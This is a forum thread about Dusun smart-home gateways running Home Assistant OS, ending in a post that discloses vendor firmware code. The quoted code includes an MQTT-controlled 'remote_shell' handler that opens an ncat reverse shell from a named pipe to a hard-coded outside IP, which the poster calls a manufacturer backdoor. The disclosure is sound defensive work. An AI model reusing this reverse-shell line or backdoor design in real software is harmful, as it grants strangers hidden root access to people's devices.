Dusun "DSGW-210-HA" Zigbee, Thread, Z-Wave, and BLE gateway appliance pre-installed with Home Assistant Operating System?

We said that @Dusun_IoT as a company should port the full Home Assistant Operation System to it.

We did not say that we have instructions on how you can do a DIY installation.

Anyway, it is not a standard mini-PC but instead a custom embedded system, so not easy to DIY it.

Again, suggest that @Dusun_IoT as a company could follow darkxst’s and ITead/Sonoff’s development approach for Sonoff iHost for the better option of porting Home Assistant Operating System in a standardized way to this hardware within the spirit of open-source software:

• GitHub - iHost-Open-Source-Project/ha-operating-system: Home Assistant OS adapted for SONOFF iHost.

  • Debugging the Home Assistant Operating System | Home Assistant Developer Docs

• GitHub - darkxst/ha-operating-system: HAOS for iHost

  • HAOS on Sonoff iHost · darkxst/ha-operating-system Wiki · GitHub

• https://community.home-assistant.io/t/sonoff-ihost-smart-home-hub-computer-from-itead-can-it-be-hacked-to-run-home-assistant-os-with-bluetooth-thread-matter-and-zha-integrations/545962/

FYI, just stumbled on several other slighty newer models of applicances from @Dusun_IoT preloaded with Home Assistant Operating System:

• Smart Home Assistant Gateway (Bluetooth/Zigbee) Multi Protocols Hub - DusunIoT

Dunsun DSGW-120 / DSGW-120V2 (based on Rockchip PX30) looks to be an all-in-one smart home control panel:

• DSGW-120 Smart Home Control Panel Touch Screen, Home Automation Wall Panel Manufacturer

  • https://www.youtube.com/watch?v=Xy3cm8QSCME

  Since it uses the Rockchip PX30 it probably uses their DSOM-020R PX30 development board which they announded a few years ago → https://www.cnx-software.com/2023/10/24/dsom-020r-px30-development-board-review-unboxing-benchmarks-and-zigbee-gateway/

They also updated their HA OS image for the Dunsun DSGW-290 model to include Frigate NVR with Local AI Object Detection on RK3568:

• Major Upgrade of DSGW-290 Smart Gateway: Deep Integration of Home Assistant and Frigate NVR to Build Localized Intelligent Security - DusunIoT

Not seeing any activity on their @dusuniot GitHub account though so do not know if they are contributing back to upstream in any way?

• dusuniot (Dusuniot) · GitHub

Llian Li at Dunsun) also have an inactive company account in the Home Assistant community forum:

• Profile - Dusun_IoT - Home Assistant Community

PS: Again, if anyone have any contacts at the Dusun company then maybe suggest to them to at the very least try to follow Sonoff/ITead/Coolkit/eWeLink’s development approach for Sonoff iHost for the better option of porting Home Assistant Operating System in a standardized way to this hardware and publish all of the projects/code/libraries publicly on GitHub to better try to follow the spirit of open-source software and community etos:

• GitHub - iHost-Open-Source-Project/ha-operating-system: Home Assistant OS adapted for SONOFF iHost.

  • Debugging the Home Assistant Operating System | Home Assistant Developer Docs

• 🎉 "HA over iHost" Open Source Project is Officially Live — Try It Out and Join the Community!

The ping command is sent by /usr/bin/dshomehad. One of the latest firmware versions posted on their forum included its source code:

int check_wwan_broken()
{
...
system("ping -c 1 www.baidu.com > /root/.homeassistant/ping &");
...
}

It also force sets 114.114.114.114 (Chinese ISP’s DNS server) as the second DNS server:

int check_dns()
{
...
system("echo nameserver 8.8.8.8 >> /etc/resolv.conf");  // config dns
system("echo nameserver 114.114.114.114 >> /etc/resolv.conf");  // config dns
...
}

But apparently, this is not the biggest problem. I accidentally stumbled upon the /usr/bin/mqtt-gw.py file, which runs with root privileges as a service when the system starts up:

root@homeassistant:~# cat /etc/init.d/rcS
#!/bin/bash
...
/etc/init.d/mqtt-gw&
...

and

root@homeassistant:~# cat /etc/init.d/mqtt-gw
#!/bin/bash
while true
do
    process=`ps -e | grep python3.11`;

    if [ -z "$process" ]; then
        sleep 1
        python3.11 mqtt-gw.py
        sleep 10
    fi
done

/usr/bin/mqtt-gw.py is an MQTT client that connects to MQTT on the vendor’s server:

server      = "cld0.roombanker.cn"
port        = 3100
heartbeat   = 60
...
rint('connect to server:' + server + ',port:' + str(port))
    while (1==1) :
        mqtt_run(server, port, heartbeat)
        time.sleep(10)

The server can send a series of commands, including:

proto_gateway_attribute_functions = {
	'gateway.remote_shell'		: proto_set_gateway_remote_shell,
	'gateway.reboot'		: proto_set_gateway_reboot,
	'gateway.upgrade_firmware'	: proto_set_gateway_upgrade_firmware,
	'gateway.change_server'		: proto_set_gateway_mqtt_server,
	'gateway.current_time'		: proto_set_gateway_current_time,
	'gateway.facorty_reset'		: proto_set_gateway_factory_reset
}

The most dangerous command on this list is the reverse shell. When it is received, your gateway connects to an unknown server in Hangzhou and gives full access to a remote user!

def proto_set_gateway_remote_shell(jmsg, id, command, attr, argmac, value):
	print('remote shell')
	os.system("killall ncat")
	os.system("(rm -rf /tmp/rmt_pipe &&  mkfifo /tmp/rmt_pipe && /bin/sh -i 2>&1  </tmp/rmt_pipe | ncat 114.215.195.44 3234 > /tmp/rmt_pipe) &")
	proto_cmdres(id, CODE_SUCCESS)

Thus, /usr/bin/mqtt-gw.py works as a backdoor built in by the manufacturer.
I strongly recommend checking your gateways and completely removing the /usr/bin/mqtt-gw.py file!